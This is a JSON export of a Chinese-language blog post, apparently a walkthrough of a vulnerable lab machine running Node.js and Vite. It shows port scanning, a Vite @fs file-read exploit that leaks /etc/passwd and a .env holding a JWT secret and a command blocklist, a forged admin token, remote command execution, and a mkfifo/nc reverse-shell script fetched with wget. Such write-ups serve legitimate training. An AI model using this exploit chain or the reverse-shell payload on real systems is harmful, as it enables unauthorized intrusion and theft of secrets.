{"id":1107,"date":"2025-06-04T21:17:15","date_gmt":"2025-06-04T13:17:15","guid":{"rendered":"http:\/\/xiyu12.top\/?p=1107"},"modified":"2025-06-04T21:17:15","modified_gmt":"2025-06-04T13:17:15","slug":"devoops","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=1107","title":{"rendered":"Devoops"},"content":{"rendered":"\n

\u4fe1\u606f\u6536\u96c6<\/h3>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ nmap -sn 192.168.249.0\/24\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-04 09:07 EDT\nNmap scan report for 192.168.249.13\nHost is up (0.011s latency).\nMAC Address: 1E:A3:33:FC:CE:96 (Unknown)\nNmap scan report for 192.168.249.195\nHost is up (0.00016s latency).\nMAC Address: 08:00:27:64:54:DC (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nNmap scan report for 192.168.249.253\nHost is up (0.00018s latency).\nMAC Address: 38:D5:7A:E0:D5:C1 (Cloud Network Technology Singapore PTE.)\nNmap scan report for 192.168.249.254\nHost is up.\nNmap done: 256 IP addresses (4 hosts up) scanned in 28.02 seconds\n                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ nmap -p- 192.168.249.195 \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-04 09:08 EDT\nNmap scan report for 192.168.249.195\nHost is up (0.00042s latency).\nNot shown: 65534 closed tcp ports (reset)\nPORT     STATE SERVICE\n3000\/tcp open  ppp\nMAC Address: 08:00:27:64:54:DC (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 14.67 seconds\n                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ nmap -sCV -p3000 192.168.249.195\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-04 09:09 EDT\nNmap scan report for 192.168.249.195\nHost is up (0.00040s latency).\n\nPORT     STATE SERVICE VERSION\n3000\/tcp open  ppp?\n| fingerprint-strings: \n|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, NCP, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: \n|     HTTP\/1.1 400 Bad Request\n|   FourOhFourRequest, GetRequest: \n|     HTTP\/1.1 403 Forbidden\n|     Vary: Origin\n|     Content-Type: text\/plain\n|     Date: Wed, 04 Jun 2025 13:09:47 GMT\n|     Connection: close\n|     Blocked request. This host (undefined) is not allowed.\n|     allow this host, add undefined to `server.allowedHosts` in vite.config.js.\n|   HTTPOptions, RTSPRequest: \n|     HTTP\/1.1 204 No Content\n|     Vary: Origin, Access-Control-Request-Headers\n|     Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE\n|     Content-Length: 0\n|     Date: Wed, 04 Jun 2025 13:09:47 GMT\n|_    Connection: close\n<\/code><\/pre>\n\n\n\n
web 3000 node.js<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
 gobuster dir -u http:\/\/192.168.249.195:3000\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt --exclude-length 414\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.249.195:3000\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] Exclude Length:          414\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/server               (Status: 200) [Size: 21764]\n\/sign                 (Status: 200) [Size: 189]\n\/execute              (Status: 401) [Size: 48]\n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
curl http:\/\/192.168.249.195:3000\/server\nimport __vite__cjsImport0_express from \"\/node_modules\/.vite\/deps\/express.js?v=5d7e4f89\"; const express = __vite__cjsImport0_express.__esModule ? __vite__cjsImport0_express.default : __vite__cjsImport0_express;\nimport __vite__cjsImport1_jsonwebtoken from \"\/node_modules\/.vite\/deps\/jsonwebtoken.js?v=5d7e4f89\"; const jwt = __vite__cjsImport1_jsonwebtoken.__esModule ? __vite__cjsImport1_jsonwebtoken.default : __vite__cjsImport1_jsonwebtoken;\nimport \"\/node_modules\/.vite\/deps\/dotenv_config.js?v=5d7e4f89\"\nimport __vite__cjsImport3_child_process from \"\/@id\/__vite-browser-external:child_process\"; const exec = __vite__cjsImport3_child_process[\"exec\"];\nimport __vite__cjsImport4_util from \"\/@id\/__vite-browser-external:util\"; const promisify = __vite__cjsImport4_util[\"promisify\"];\n\nconst app = express();\n\nconst address = 'localhost';\nconst port = 3001;\n\nconst exec_promise = promisify(exec);\n\nconst COMMAND_FILTER = process.env.COMMAND_FILTER\n    ? process.env.COMMAND_FILTER.split(',')\n        .map(cmd => cmd.trim().toLowerCase())\n        .filter(cmd => cmd !== '')\n    : [];\n\napp.use(express.json());\n\nfunction is_safe_command(cmd) {\n    if (!cmd || typeof cmd !== 'string') {\n        return false;\n    }\n    if (COMMAND_FILTER.length === 0) {\n        return false;\n    }\n\n    const lower_cmd = cmd.toLowerCase();\n\n    for (const forbidden of COMMAND_FILTER) {\n        const regex = new RegExp(`\\\\b${forbidden.replace(\/[.*+?^${}()|[\\]\\\\]\/g, '\\\\$&')}\\\\b|^${forbidden.replace(\/[.*+?^${}()|[\\]\\\\]\/g, '\\\\$&')}$`, 'i');\n        if (regex.test(lower_cmd)) {\n            return false;\n        }\n    }\n\n    if (\/[;&|]\/.test(cmd)) {\n        return false;\n    }\n    if (\/[<>]\/.test(cmd)) {\n        return false;\n    }\n    if (\/[`$()]\/.test(cmd)) {\n        return false;\n    }\n\n    return true;\n}\n\nasync function execute_command_sync(command) {\n    try {\n        const { stdout, stderr } = await exec_promise(command);\n\n        if (stderr) {\n            return { status: false, data: { stdout, stderr } };\n        }\n        return { status: true, data: { stdout, stderr } };\n    } catch (error) {\n        return { status: true, data: error.message };\n    }\n}\n\napp.get('\/', (req, res) => {\n    return res.json({\n        'status': 'working',\n        'data': `listening on http:\/\/${address}:${port}`\n    })\n})\n\napp.get('\/api\/sign', (req, res) => {\n    return res.json({\n        'status': 'signed',\n        'data': jwt.sign({\n            uid: -1,\n            role: 'guest',\n        }, process.env.JWT_SECRET, { expiresIn: '1800s' }),\n    });\n});\n\napp.get('\/api\/execute', async (req, res) => {\n    const authorization_header_raw = req.headers['authorization'];\n    if (!authorization_header_raw || !authorization_header_raw.startsWith('Bearer ')) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': 'permission denied'\n        });\n    }\n\n    const jwt_raw = authorization_header_raw.split(' ')[1];\n\n    try {\n        const payload = jwt.verify(jwt_raw, process.env.JWT_SECRET);\n        if (payload.role !== 'admin') {\n            return res.status(403).json({\n                'status': 'rejected',\n                'data': 'permission denied'\n            });\n        }\n    } catch (err) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `permission denied`\n        });\n    }\n\n    const command = req.query.cmd;\n\n    const is_command_safe = is_safe_command(command);\n    if (!is_command_safe) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `this command is unsafe`\n        });\n    }\n\n    const result = await execute_command_sync(command);\n\n    return res.json({\n        'status': result.status === true ? 'executed' : 'failed',\n        'data': result.data\n    })\n});\n\napp.listen(port, address, () => {\n    console.log(`Listening on http:\/\/${address}:${port}`)\n});\n<\/code><\/pre>\n\n\n\n
\u547d\u4ee4\u6267\u884c\u4ee3\u7801\uff0c\u9700\u8981\u8ba4\u8bc1<\/p>\n\n\n\n
app.get('\/api\/execute', async (req, res) => {\n    const authorization_header_raw = req.headers['authorization'];\n    if (!authorization_header_raw || !authorization_header_raw.startsWith('Bearer ')) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': 'permission denied'\n        });\n    }\n\n    const jwt_raw = authorization_header_raw.split(' ')[1];\n\n    try {\n        const payload = jwt.verify(jwt_raw, process.env.JWT_SECRET);\n        if (payload.role !== 'admin') {\n            return res.status(403).json({\n                'status': 'rejected',\n                'data': 'permission denied'\n            });\n        }\n    } catch (err) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `permission denied`\n        });\n    }\n\n    const command = req.query.cmd;\n\n    const is_command_safe = is_safe_command(command);\n    if (!is_command_safe) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `this command is unsafe`\n        });\n    }\n\n    const result = await execute_command_sync(command);\n\n    return res.json({\n        'status': result.status === true ? 'executed' : 'failed',\n        'data': result.data\n    })\n});<\/code><\/pre>\n\n\n\n
\u7acb\u8db3\u70b9<\/h3>\n\n\n\n
\u5c1d\u8bd5\u8bbf\u95ee sign \u53d1\u73b0\u662fjwt \u7684token\uff0c\u548c\u4ee3\u7801\u7ed3\u5408\uff0c\u662fcode.js \u4ee3\u7801 \u7684jwt \uff0c\u7528\u6765\u8fdb\u884c\u8ba4\u8bc1\uff0c\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\u3002<\/p>\n\n\n\n
jwt \u7684\u5185\u5bb9<\/p>\n\n\n\n
app.get('\/api\/sign', (req, res) => {\n    return res.json({\n        'status': 'signed',\n        'data': jwt.sign({\n            uid: -1,\n            role: 'guest',\n        }, process.env.JWT_SECRET, { expiresIn: '1800s' }),\n    });\n});<\/code><\/pre>\n\n\n\n
\u63d0\u4ea4 jwt \u8fdb\u884c\u8ba4\u8bc1<\/p>\n\n\n\n
app.get('\/api\/execute', async (req, res) => {\n    const authorization_header_raw = req.headers['authorization'];\n    if (!authorization_header_raw || !authorization_header_raw.startsWith('Bearer ')) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': 'permission denied'\n        });\n    }\ntry {\n        const payload = jwt.verify(jwt_raw, process.env.JWT_SECRET);\n        if (payload.role !== 'admin') {\n            return res.status(403).json({\n                'status': 'rejected',\n                'data': 'permission denied'\n            });\n        }\n    } catch (err) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `permission denied`\n        });\n    }<\/code><\/pre>\n\n\n\n
\u5c1d\u8bd5 \u4e00\u4e0b\uff0c\u53d1\u73b0\u6ca1\u95ee\u9898\uff0c\u63d0\u4ea4\u4e86jwt\uff0c\u5f53\u4e0d\u662fadmin \u8fd4\u56de403<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ curl -I http:\/\/192.168.249.195:3000\/execute -H \"Authorization: Bearer \"\nHTTP\/1.1 401 Unauthorized\nVary: Origin\nx-powered-by: Express\ncontent-type: application\/json; charset=utf-8\ncontent-length: 48\netag: W\/\"30-rLvMChMv+pJKO\/lWTBS3l8hflxA\"\ndate: Wed, 04 Jun 2025 14:16:33 GMT\nconnection: close                                                                                                                                          \n                                                                                                                                                                                                                                                                 \n                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ curl -s  http:\/\/192.168.249.195:3000\/sign |jq .data\n\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOi0xLCJyb2xlIjoiZ3Vlc3QiLCJpYXQiOjE3NDkwNDY2MjgsImV4cCI6MTc0OTA0ODQyOH0.8ZnjQ7wEceXhwvoDn8RCCDiAP6gI8vCHogYDk1lhWBQ\"                                                                                                                        \n                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ curl -s  http:\/\/192.168.249.195:3000\/sign |jq .data | xargs -I {} curl -I http:\/\/192.168.249.195:3000\/execute -H \"Authorization: Bearer {}\" \n\nHTTP\/1.1 403 Forbidden\nVary: Origin\nx-powered-by: Express\ncontent-type: application\/json; charset=utf-8\ncontent-length: 48\netag: W\/\"30-rLvMChMv+pJKO\/lWTBS3l8hflxA\"\ndate: Wed, 04 Jun 2025 14:17:50 GMT\nconnection: close\n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\u5c1d\u8bd5\u4f7f\u7528hashcat \u7206\u7834secret,\u6ca1\u51fa\u6765<\/p>\n\n\n\n
hashcat -m 16500 ~\/Desktop\/jwt.txt -a 0 \/usr\/share\/wordlists\/rockyou.txt --force<\/code><\/pre>\n\n\n\n
vite ,\u540e\u9762\u53d1\u73b0\u4e86vite \uff0c\u6709\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u3002<\/p>\n\n\n\n
http://192.168.249.195:3000\/@fs\/etc\/passwd?import&raw??\nexport default \"root:x:0:0:root:\/root:\/bin\/sh\\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\\nsync:x:5:0:sync:\/sbin:\/bin\/sync\\nshutdown:x:6:0:shutdown:\/sbin:\/sbin\/shutdown\\nhalt:x:7:0:halt:\/sbin:\/sbin\/halt\\nmail:x:8:12:mail:\/var\/mail:\/sbin\/nologin\\nnews:x:9:13:news:\/usr\/lib\/news:\/sbin\/nologin\\nuucp:x:10:14:uucp:\/var\/spool\/uucppublic:\/sbin\/nologin\\ncron:x:16:16:cron:\/var\/spool\/cron:\/sbin\/nologin\\nftp:x:21:21::\/var\/lib\/ftp:\/sbin\/nologin\\nsshd:x:22:22:sshd:\/dev\/null:\/sbin\/nologin\\ngames:x:35:35:games:\/usr\/games:\/sbin\/nologin\\nntp:x:123:123:NTP:\/var\/empty:\/sbin\/nologin\\nguest:x:405:100:guest:\/dev\/null:\/sbin\/nologin\\nnobody:x:65534:65534:nobody:\/:\/sbin\/nologin\\nklogd:x:100:101:klogd:\/dev\/null:\/sbin\/nologin\\nchrony:x:101:102:chrony:\/var\/log\/chrony:\/sbin\/nologin\\nrunner:x:1000:1000:::\/bin\/sh\\nhana:x:1001:100::\/home\/hana:\/bin\/sh\\ngitea:x:102:82:gitea:\/var\/lib\/gitea:\/bin\/sh\\n\"\n\nhttp:\/\/192.168.249.195:3000\/@fs\/home\/hana\/user.txt?import&raw??\nEACCES: permission denied, open '\/home\/hana\/user.txt'\n\n    at async open (node:internal\/fs\/promises:638:25)\n    at async Object.readFile (node:internal\/fs\/promises:1242:14)\n    at async LoadPluginContext.load (file:\/\/\/opt\/node\/node_modules\/.pnpm\/vite@6.2.0\/node_modules\/vite\/dist\/node\/chunks\/dep-ByPKlqZ5.js:13528:11)\n    at async EnvironmentPluginContainer.load (file:\/\/\/opt\/node\/node_modules\/.pnpm\/vite@6.2.0\/node_modules\/vite\/dist\/node\/chunks\/dep-ByPKlqZ5.js:47602:22)\n    at async loadAndTransform (file:\/\/\/opt\/node\/node_modules\/.pnpm\/vite@6.2.0\/node_modules\/vite\/dist\/node\/chunks\/dep-ByPKlqZ5.js:41252:22\n\n\u53d1\u73b0\u8def\u5f84  \/opt\/node\/ \u5c1d\u8bd5\u8bfb\u53d6\u914d\u7f6e\u6587\u4ef6\nhttp:\/\/192.168.249.195:3000\/@fs\/opt\/node\/.env?import&raw??\n\nexport default \"JWT_SECRET='2942szKG7Ev83aDviugAa6rFpKixZzZz'\\nCOMMAND_FILTER='nc,python,python3,py,py3,bash,sh,ash,|,&,<,>,ls,cat,pwd,head,tail,grep,xxd'\\n\"<\/code><\/pre>\n\n\n\n
secret  2942szKG7Ev83aDviugAa6rFpKixZzZz<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
\u83b7\u53d6\u53cd\u5f39shell  \u201cCOMMAND_FILTER=’nc,python,python3,py,py3,bash,sh,ash,|,&,<,>,ls,cat,pwd,head,tail,grep,xxd’\\n”\u201d \u8fd9\u4e9b\u547d\u4ee4\u4f1a\u8fc7\u6ee4<\/p>\n\n\n\n
 echo \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc0OTA0Nzk4OSwiZXhwIjoxNzQ5MDQ5Nzg5fQ.sWGyZ_xBFSU8OvHlg4EIeH6laioJQyhbxO0ZEDjrWug\"| xargs -I {} curl  http:\/\/192.168.249.195:3000\/execute?cmd=id -H \"Authorization: Bearer {}\"\n\n{\"status\":\"executed\",\"data\":{\"stdout\":\"uid=1000(runner) gid=1000(runner) groups=1000(runner)\\n\",\"stderr\":\"\"}} <\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\u4e0a\u4f20\u4e00\u4e2a\u6587\u4ef6\u6267\u884c\u53cd\u5f39<\/p>\n\n\n\n
 echo \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc0OTA0Nzk4OSwiZXhwIjoxNzQ5MDQ5Nzg5fQ.sWGyZ_xBFSU8OvHlg4EIeH6laioJQyhbxO0ZEDjrWug\"| xargs -I {} curl  http:\/\/192.168.249.195:3000\/execute?cmd=wget+-h -H \"Authorization: Bearer {}\"\n\n{\"status\":\"executed\",\"data\":\"Command failed: wget -h\\nwget: unrecognized option: h\\nBusyBox v1.37.0 (2025-01-17 18:12:01 UTC) multi-call binary.\\n\\nUsage: wget [-cqS] [--spider] [-O FILE] [-o LOGFILE] [--header STR]\\n\\t[--post-data STR | --post-file FILE] [-Y on\/off]\\n\\t[-P DIR] [-U AGENT] [-T SEC] URL...\\n\\nRetrieve files via HTTP or FTP\\n\\n\\t--spider\\tOnly check URL existence: $? is 0 if exists\\n\\t--header STR\\tAdd STR (of form 'header: value') to headers\\n\\t--post-data STR\\tSend STR using POST method\\n\\t--post-file FILE\\tSend FILE using POST method\\n\\t-c\\t\\tContinue retrieval of aborted transfer\\n\\t-q\\t\\tQuiet\\n\\t-P DIR\\t\\tSave to DIR (default .)\\n\\t-S    \\t\\tShow server response\\n\\t-T SEC\\t\\tNetwork read timeout is SEC seconds\\n\\t-O FILE\\t\\tSave to FILE ('-' for stdout)\\n\\t-o LOGFILE\\tLog messages to FILE\\n\\t-U STR\\t\\tUse STR for User-Agent header\\n\\t-Y on\/off\\tUse proxy\\n\"} \n\n cat a                                              \nrm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 192.168.70.254 8888 >\/tmp\/f\n                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ python3 -m http.server\nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ echo \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc0OTA0Nzk4OSwiZXhwIjoxNzQ5MDQ5Nzg5fQ.sWGyZ_xBFSU8OvHlg4EIeH6laioJQyhbxO0ZEDjrWug\"| xargs -I {} curl  http:\/\/192.168.249.195:3000\/execute?cmd=wget+http:\/\/192.168.249.1:8000\/a+-O+\/tmp\/a -H \"Authorization: Bearer {}\"\n\n{\"status\":\"failed\",\"data\":{\"stdout\":\"\",\"stderr\":\"Connecting to 192.168.249.1:8000 (192.168.249.1:8000)\\nsaving to '\/tmp\/a'\\na                    100% |********************************|    81  0:00:00 ETA\\n'\/tmp\/a' saved\\n\"}} \n                                                                                                                                            \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ echo \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc0OTA0Nzk4OSwiZXhwIjoxNzQ5MDQ5Nzg5fQ.sWGyZ_xBFSU8OvHlg4EIeH6laioJQyhbxO0ZEDjrWug\"| xargs -I {} curl  http:\/\/192.168.249.195:3000\/execute?cmd=source+\/tmp\/a -H \"Authorization: Bearer {}\"\n\n\n rlwrap nc -lvnp 8888\nlistening on [any] 8888 ...\nconnect to [192.168.249.1] from (UNKNOWN) [192.168.249.195] 39595\n\/bin\/sh: can't access tty; job control turned off\n\/opt\/node $ \n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4fe1\u606f\u6536\u96c6 web 3000 node.js \u547d\u4ee4\u6267\u884c\u4ee3\u7801\uff0c\u9700\u8981\u8ba4\u8bc1 \u7acb\u8db3\u70b9 \u5c1d\u8bd5\u8bbf\u95ee sign \u53d1\u73b0\u662fjwt  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1107","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1107"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1107\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1107"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1107"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}